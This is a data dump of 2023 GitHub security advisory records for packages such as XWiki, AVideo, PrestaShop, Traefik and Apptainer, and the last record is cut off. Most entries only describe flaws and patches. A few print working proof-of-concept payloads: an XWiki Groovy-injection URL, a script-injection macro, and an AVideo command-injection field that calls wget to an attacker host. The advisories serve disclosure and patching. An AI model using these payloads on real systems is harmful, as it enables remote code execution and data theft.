[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30522'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-04-12/#SECURITY-2873'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/04/13/3'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T22:18:21Z', 'nvd_published_at': '2023-04-12T18:15:00Z'}
|
1.4.0
|
GHSA-w7jm-9x4m-8qc3
|
2023-05-05T20:35:41Z
|
2023-04-27T03:30:23Z
| null |
['CVE-2023-31286']
|
User account enumeration in Serenity
|
An issue was discovered in Serenity Serene (and StartSharp) before 6.7.0. When a password reset request occurs, the server response leaks the existence of users. If one tries to reset a password of a non-existent user, an error message indicates that this user does not exist.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'Serenity.Net.Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.7.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Serenity.Net.Web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.7.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31286'}, {'type': 'WEB', 'url': 'https://github.com/serenity-is/Serenity/commit/11b9d267f840513d04b4f4d4876de7823a6e48d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/serenity-is/Serenity'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/172648/Serenity-StartSharp-Software-File-Upload-XSS-User-Enumeration-Reusable-Tokens.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2023/May/14'}]
|
{'cwe_ids': ['CWE-209'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-27T17:09:01Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-476g-v7hf-cw5m
|
2023-04-27T19:36:17Z
|
2023-04-27T19:36:17Z
| null |
['CVE-2023-2322']
|
Cross-site Scripting (XSS) in Document Properties Parameter
|
### Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites.
### Patches
Update to version 10.5.21 or apply this patch manually https://github.com/pimcore/pimcore/commit/9fc674892b8b53103098b9524705074a45e7f773.patch
### Workarounds
Apply patch https://github.com/pimcore/pimcore/commit/9fc674892b8b53103098b9524705074a45e7f773.patch manually.
### References
https://huntr.dev/bounties/f7228f3f-3bef-46fe-b0e3-56c432048a67/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.21'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-476g-v7hf-cw5m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2322'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/9fc674892b8b53103098b9524705074a45e7f773'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/f7228f3f-3bef-46fe-b0e3-56c432048a67'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-27T19:36:17Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-fh7r-996q-gvcp
|
2023-04-25T19:47:05Z
|
2023-04-25T19:47:05Z
| null |
['CVE-2023-30838']
|
Possible XSS injection through Validate::isCleanHTML method
|
### Impact
ValidateCore::isCleanHTML() method of Prestashop misses hijickable events which can lead to XSS injection, allowed by the presence of pre-setup @keyframes methods.
This XSS which hijacks HTML attributes will be triggered without any interaction of the visitor/administrator which makes it as dangerous as a trivial XSS.
Contrary to most XSS which target HTML attributes and which are triggered without user interaction (such as onload / onerror which suffer from a very limited scope), this one can hijack every HTML element, which increases the danger due to a complete HTML elements scope.
### Patches
The patch will be on PS 8.0.4 and PS 1.7.8.9
### References
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.8.9'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-fh7r-996q-gvcp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30838'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/46408ae4b02f3b8b1bb6e9dc63af5bcd858abd9c'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/dc682192df0e4b0d656a8e645b29ca1b9dbe3693'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/releases/tag/1.7.8.9'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/releases/tag/8.0.4'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-25T19:47:05Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7hj9-rv74-5g92
|
2023-04-25T21:00:36Z
|
2023-04-11T20:59:22Z
| null |
['CVE-2023-29013']
|
Traefik HTTP header parsing could cause a denial of service
|
### Impact
There is a vulnerability in [Go when parsing the HTTP headers](https://groups.google.com/g/golang-announce/c/Xdv6JL9ENs8/m/OV40vnafAwAJ), which impacts Traefik.
HTTP header parsing could allocate substantially more memory than required to hold the parsed headers. This behavior could be exploited to cause a denial of service.
### References
- [CVE-2023-24534](https://www.cve.org/CVERecord?id=CVE-2023-24534)
### Patches
- https://github.com/traefik/traefik/releases/tag/v2.9.10
- https://github.com/traefik/traefik/releases/tag/v2.10.0-rc2
### Workarounds
No workaround.
### For more information
If you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/traefik/traefik/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/traefik/traefik/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.10.0-rc1'}, {'fixed': '2.10.0-rc2'}]}], 'versions': ['2.10.0-rc1']}]
|
[{'type': 'WEB', 'url': 'https://github.com/traefik/traefik/security/advisories/GHSA-7hj9-rv74-5g92'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29013'}, {'type': 'WEB', 'url': 'https://github.com/traefik/traefik/commit/4ed3964b3586565519249bbdc55eb1b961c08c49'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-8v5j-pwr7-w5f8'}, {'type': 'PACKAGE', 'url': 'https://github.com/traefik/traefik'}, {'type': 'WEB', 'url': 'https://github.com/traefik/traefik/releases/tag/v2.10.0-rc2'}, {'type': 'WEB', 'url': 'https://github.com/traefik/traefik/releases/tag/v2.9.10'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/golang-announce/c/Xdv6JL9ENs8/m/OV40vnafAwAJ'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230517-0008/'}]
|
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-11T20:59:22Z', 'nvd_published_at': '2023-04-14T19:15:00Z'}
|
1.4.0
|
GHSA-w7v9-fc49-4qg4
|
2023-04-26T20:33:26Z
|
2023-04-12T20:35:30Z
| null |
['CVE-2023-29211']
|
org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki Eval Injection vulnerability
|
### Impact
Any user with view rights `WikiManager.DeleteWiki` can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the `wikiId` url parameter.
A proof of concept exploit is to open <xwiki-host>/xwiki/bin/view/WikiManager/DeleteWiki?wikiId=%22+%2F%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D where <xwiki-host> is the URL of your XWiki installation.
### Patches
The problem has been patched on XWiki 13.10.11, 14.4.7, and 14.10.
### Workarounds
The issue can be fixed manually applying this [patch](https://github.com/xwiki/xwiki-platform/commit/ba4c76265b0b8a5e2218be400d18f08393fe1428#diff-64f39f5f2cc8c6560a44e21a5cfd509ef00e8a2157cd9847c9940a2e08ea43d1R63-R64).
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3-milestone-2'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-w7v9-fc49-4qg4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29211'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/ba4c76265b0b8a5e2218be400d18f08393fe1428#diff-64f39f5f2cc8c6560a44e21a5cfd509ef00e8a2157cd9847c9940a2e08ea43d1R63-R64'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20297'}]
|
{'cwe_ids': ['CWE-94', 'CWE-95'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:35:30Z', 'nvd_published_at': '2023-04-16T07:15:00Z'}
|
1.4.0
|
GHSA-85pf-r4c7-3j9r
|
2023-04-14T20:26:45Z
|
2023-04-07T15:30:38Z
| null |
['CVE-2023-28707']
|
Apache Airflow Drill Provider vulnerable to improper input validation
|
Apache Software Foundation's Apache Airflow Drill Provider before 2.3.2 is vulnerable to improper input validation because the host passed in drill connection is not sanitized.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-drill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28707'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/30215'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/dfoj7q1nd0vhhsl8fjg63z4j6mfmdxtk'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/04/07/1'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T22:22:54Z', 'nvd_published_at': '2023-04-07T15:15:00Z'}
|
1.4.0
|
GHSA-x422-6qhv-p29g
|
2023-05-01T13:43:17Z
|
2023-04-28T00:30:29Z
| null |
['CVE-2023-2356']
|
Relative path traversal in mlflow
|
Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'mlflow'}, 'ecosystem_specific': {'affected_functions': ['mlflow.server.handlers._validate_non_local_source_contains_relative_paths', 'mlflow.server.handlers._validate_source']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2356'}, {'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/commit/f73147496e05c09a8b83d95fb4f1bf86696c6342'}, {'type': 'PACKAGE', 'url': 'https://github.com/mlflow/mlflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2023-68.yaml'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896'}]
|
{'cwe_ids': ['CWE-23'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T13:43:17Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2ggc-552c-rmqr
|
2023-05-05T20:34:31Z
|
2023-04-28T15:30:18Z
| null |
['CVE-2023-28476']
|
Stored cross site scripting on tags
|
Concrete CMS (previously concrete5) before 9.2 is vulnerable to Stored XSS on Tags on uploaded files.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.2.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28476'}, {'type': 'WEB', 'url': 'https://concretecms.com'}, {'type': 'WEB', 'url': 'https://www.concretecms.org/about/project-news/security/concrete-cms-security-advisory-2023-04-20'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T13:47:37Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6vrj-ph27-qfp3
|
2023-04-28T20:05:39Z
|
2023-04-27T23:53:45Z
| null |
['CVE-2023-30854']
|
Remote code injection in wwbn/avideo
|
# WWBN Avideo Authenticated RCE - OS Command Injection
## Description
An OS Command Injection vulnerability in an Authenticated endpoint `/plugin/CloneSite/cloneClient.json.php` allows attackers to achieve Remote Code Execution.
Vulnerable code:
```php
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);
```
We can control `$objClone->cloneSiteURL` through the admin panel clone site feature.
`/plugin/CloneSite/cloneClient.json.php` sends a GET Request to `{$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php`. I hosted a specially crafted `cloneServer.json.php` that prints the following JSON data
```JSON
{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]}
```
Send a GET Request to `/plugin/CloneSite/cloneClient.json.php` then remote code execution is achieved.

|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'wwbn/avideo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/WWBN/AVideo/security/advisories/GHSA-6vrj-ph27-qfp3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30854'}, {'type': 'WEB', 'url': 'https://github.com/WWBN/AVideo/commit/020415d22f36d93ed865eb61994b49caa0f7f90a'}, {'type': 'PACKAGE', 'url': 'https://github.com/WWBN/AVideo'}]
|
{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-27T23:53:45Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-j927-269r-96xw
|
2023-04-04T16:19:20Z
|
2023-04-02T21:30:17Z
| null |
['CVE-2023-28678']
|
Jenkins Cppcheck Plugin vulnerable to stored cross-site scripting (XSS)
|
Jenkins Cppcheck Plugin 1.26 and earlier does not escape file names from Cppcheck report files before showing them on the Jenkins UI.
This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control report file contents.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:cppcheck'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.26'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28678'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/cppcheck-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-21/#SECURITY-2809'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-04T16:19:20Z', 'nvd_published_at': '2023-04-02T21:15:00Z'}
|
1.4.0
|
GHSA-j4rf-7357-f4cg
|
2023-07-07T23:16:31Z
|
2023-04-25T19:48:35Z
| null |
['CVE-2023-30549']
|
Unpatched extfs vulnerabilities are exploitable through suid-mode Apptainer
|
### Impact
There is an ext4 use-after-free flaw described in CVE-2022-1184 that is exploitable through versions of Apptainer < 1.1.0 and installations that include apptainer-suid < 1.1.8 on older operating systems where that CVE has not been patched. That includes Red Hat Enterprise Linux 7, Debian 10 buster (unless the linux-5.10 package is installed), Ubuntu 18.04 bionic and Ubuntu 20.04 focal. Use-after-free flaws in the kernel can be used to attack the kernel for denial of service and potentially for privilege escalation.
### Background
Historically there have been many CVEs published for extfs and a smaller number for squashfs, including serious use-after-free and buffer overrun vulnerabilities, that are scored as "Moderate" or "Low" impact only because unprivileged users were assumed to not have write access to the raw data. Because of those ratings, vendors treat such CVEs as low urgency and either delay a patch until their next major release or never patch older but still supported operating systems at all. Many Linux distributions automatically mount user-writable USB-drive volumes, but those are considered low risk because they require physical access to the machine. However, since setuid-root installations of Apptainer by default allow all users to mount any extfs (specifically, ext3, which is implemented by the ext4 driver) and squashfs filesystem using kernel drivers even though the users have write access to the raw data, the setuid-root installations raise the severity of such unpatched CVEs.
CVE-2022-1184 is currently such an unpatched CVE, at least on the above listed operating systems. The descriptions from the operating system vendors about the CVE (referenced below) are incomplete, saying only that it allows a local attacker with user privilege to cause a denial of service. Normally users would not be able to cause it because they cannot modify the filesystem image, and normally vulnerabilities that involve kernel memory corruption by unprivileged users are considered high severity even when there is not yet a known privilege escalation because someone with sufficient kernel knowledge can usually turn such a corruption into a privilege escalation.
Red Hat did not list RHEL7 as vulnerable, but they also did not list it as unaffected, and testing confirmed that a filesystem image could be corrupted to get past the check inserted into the filesystem driver to fix the vulnerability (patches linked below).
All published squashfs CVEs have been patched in currently supported major operating systems.
### Patches
Apptainer 1.1.8 includes a patch that by default disables mounting of extfs filesystem types in setuid-root mode, while continuing to allow mounting of extfs filesystems in non-setuid "rootless" mode using fuse2fs.
### Workarounds
These workarounds are possible:
1. Either do not install apptainer-suid (for versions 1.1.0 through 1.1.7) or set `allow setuid = no` in apptainer.conf. This requires having unprivileged user namespaces enabled and except for apptainer 1.1.x versions will disallow mounting of sif files, extfs files, and squashfs files in addition to other, less significant impacts. (Encrypted sif files are also not supported unprivileged in apptainer 1.1.x.)
2. Alternatively, use the `limit containers` options in apptainer.conf/singularity.conf to limit sif files to trusted users, groups, and/or paths. (The option `allow container extfs = no` disallows mounting extfs overlay files but does not disallow mounting of extfs overlay partitions inside SIF files, so it does not help work around the problem.)
### References
https://nvd.nist.gov/vuln/detail/CVE-2022-1184
https://access.redhat.com/security/cve/cve-2022-1184
https://security-tracker.debian.org/tracker/CVE-2022-1184
https://ubuntu.com/security/CVE-2022-1184
Kernel patches for CVE-2022-1184:
https://github.com/torvalds/linux/commit/65f8ea4cd57dbd46ea13b41dc8bac03176b04233
https://github.com/torvalds/linux/commit/61a1d87a324ad5e3ed27c6699dfc93218fcf3201
------
## Addendum 30 May 2023
New information has become available: many ext4 filesytem vulnerabilities similar to the one in CVE-2022-1184 continue to be found, and most of them do not ever have a CVE assigned. The way to locate them is to search for "syzbot" in linux kernel commit messages under fs/ext4. "syzbot" is a public automated system for finding kernel bugs. Especially when syzbot reports are labeled "KASAN" (Kernel Address Sanitizer) and especially if they involve memory corruption including "use after free", "out of bounds", or "user-memory-access", they are vulnerabilities that can potentially be turned into privilege escalation when an unprivileged user has write access to the underlying data.
In particular there are two such commits from this month, May 2023, referenced below. They both have commit messages describing a situation of write access to the underlying data while the kernel has that data mounted as a filesystem. These commits have been backported to currently maintained kernel lines in versions 4.19.293 and 5.4.243, but since they are considered moderate severity, most common OS distributions do not include them immediately. For example since RHEL9.2 was recently announced, they are not likely to be available in RHEL9 until 9.3 is released in about another 6 months. Therefore if system administrators want to be protected against these vulnerabilities while still allowing ext4 filesystem mounts through setuid-root apptainer, they should watch for these types of commits and whenever such commits are released the administrators should update to the latest currently maintained kernel version (bypassing their OS vendor's distribution) and reboot.
https://github.com/torvalds/linux/commit/2220eaf90992c11d888fe771055d4de3303
https://github.com/torvalds/linux/commit/4f04351888a83e595571de672e0a4a8b74f
https://lwn.net/Articles/932137/
https://lwn.net/Articles/932136/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/apptainer/apptainer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.8'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/apptainer/apptainer/security/advisories/GHSA-j4rf-7357-f4cg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-1184'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30549'}, {'type': 'WEB', 'url': 'https://github.com/apptainer/apptainer/commit/5a4964f5ba9c8d89a0e353b97f51fd607670a9f7'}, {'type': 'WEB', 'url': 'https://github.com/torvalds/linux/commit/61a1d87a324ad5e3ed27c6699dfc93218fcf3201'}, {'type': 'WEB', 'url': 'https://github.com/torvalds/linux/commit/65f8ea4cd57dbd46ea13b41dc8bac03176b04233'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2022-1184'}, {'type': 'PACKAGE', 'url': 'https://github.com/apptainer/apptainer'}, {'type': 'WEB', 'url': 'https://github.com/apptainer/apptainer/releases/tag/v1.1.8'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2022-1184'}, {'type': 'WEB', 'url': 'https://sylabs.io/2023/04/response-to-cve-2023-30549/'}, {'type': 'WEB', 'url': 'https://ubuntu.com/security/CVE-2022-1184'}, {'type': 'WEB', 'url': 'https://www.suse.com/security/cve/CVE-2022-1184.html'}]
|
{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-25T19:48:35Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6vgh-9r3c-2cxp
|
2023-04-26T22:16:13Z
|
2023-04-12T20:43:21Z
| null |
['CVE-2023-29207']
|
Improper Neutralization of Script-Related HTML Tags (XSS) in the LiveTable Macro
|
### Impact
The [Livetable Macro](https://extensions.xwiki.org/xwiki/bin/view/Extension/Livetable%20Macro) wasn't properly sanitizing column names, thus allowing the insertion of raw HTML code including JavaScript. This vulnerability was also exploitable via the [Documents Macro](https://extensions.xwiki.org/xwiki/bin/view/Extension/Documents%20Macro) that is included since XWiki 3.5M1 and doesn't require script rights, this can be demonstrated with the syntax `{{documents id="example" count="5" actions="false" columns="doc.title, before<script>alert(1)</script>after"/}}`. Therefore, this can also be exploited by users without script right and in comments. With the interaction of a user with more rights, this could be used to execute arbitrary actions in the wiki, including privilege escalation, remote code execution, information disclosure, modifying or deleting content.
### Patches
This has been patched in XWiki 14.9, 14.4.6, and 13.10.10.
### Workarounds
It is possible to apply the [patch](https://github.com/xwiki/xwiki-platform/commit/65ca06c51e7a1d5a579344c7272b2cc9a9a21126) to existing installations without upgrading. Only the files `skins/flamingo/macros.vm` and `templates/macros.vm` in the web application directory need to be replaced by a patched version.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9-milestone-2'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9-milestone-2'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9-milestone-2'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9-milestone-2'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9-milestone-2'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-web-standard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9-milestone-2'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-web-standard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 